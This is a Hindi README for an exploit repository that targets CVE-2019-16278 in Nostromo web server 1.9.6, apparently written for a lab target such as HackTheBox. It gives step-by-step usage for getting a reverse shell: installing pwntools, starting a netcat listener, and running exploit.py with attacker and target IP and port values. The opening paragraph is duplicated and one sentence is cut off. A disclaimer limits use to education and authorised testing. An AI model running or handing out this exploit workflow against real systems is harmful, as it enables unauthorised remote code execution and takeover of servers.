
इस रिपॉज़िटरी में Nostromo Web Server 1.9.6 के लिए CVE-2019-16278 का एक एक्सप्लॉइट शामिल है, जो डायरेक्टरी ट्रैवर्सल भेद्यता के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है। स्क्रिप्ट रिवर्स शेल स्थापित करने के लिए pwntools का उपयोग करती है। केवल शैक्षिक और अधिकृत परीक्षण उपयोग के लिए।
इस रिपॉजिटरी में Nostromo Web Server 1.9.6 के CVE-2019-16278 के लिए एक एक्सप्लॉइट है, जो डायरेक्टरी ट्रैवर्सल भेद्यता के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है। स्क्रिप्ट रिवर्स शेल स्थापित करने के लिए pwntools का उपयोग करती है। केवल शैक्षिक और अधिकृत परीक्षण उपयोग के लिए।
pwntools स्थापित करने के लिए, उपयोग करें:
pip3 install pwntools
लिसनर शुरू करें: हमलावर मशीन पर, रिवर्स शेल प्राप्त करने के लिए निर्दिष्ट पोर्ट पर एक लिसनर शुरू करें:
nc -lvnp <attacker-port>
स्क्रिप्ट चलाएँ: एक्सप्लॉइट स्क्रिप्ट को निष्पादित करने के लिए निम्न कमांड का उपयोग करें। आवश्यकतानुसार मान बदलें।
python3 exploit.py --attacker-ip <attacker-ip> --attacker-port <attacker-port> [-t target-ip] [-p target-port]
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80
इस उदाहरण में:
--attacker-ip 10.10.14.15 हमलावर मशीन का IP पता है।--attacker-port 4444 वह पोर्ट है जिस पर हमलावर मशीन रिवर्स शेल के लिए सुन रही है।-t 10.10.10.165 लक्ष्य IP निर्दिष्ट करता है (डिफ़ॉल्ट 10.10.10.165 है)।-p 80 लक्ष्य पोर्ट निर्दिष्ट करता है (डिफ़ॉल्ट 80 है)।nc) का उपयोग करके रिवर्स शेल कमांड के साथ एक HTTP अनुरोध बनाता है।सफल होने पर, आपको अपने लिसनर पर लक्ष्य प्रणाली तक पहुँच के साथ एक रिवर्स शेल प्राप्त होना चाहिए।
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए लेखक और योगदानकर्ता जिम्मेदार नहीं हैं। इसका जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर जिनके परीक्षण की अनुमति आपके पास है।
| विकल्प | विवरण | डिफ़ॉल्ट |
|---|
-t, --target | रिमोट होस्ट का IP पता | 10.10.10.165 |
-p, --port | लक्षित करने के लिए रिमोट होस्ट पर पोर्ट | 80 |
--attacker-ip | रिवर्स शेल के लिए हमलावर मशीन का IP पता | None (आवश्यक) |
--attacker-port | रिवर्स शेल के लिए हमलावर मशीन पर पोर्ट | None (आवश्यक) |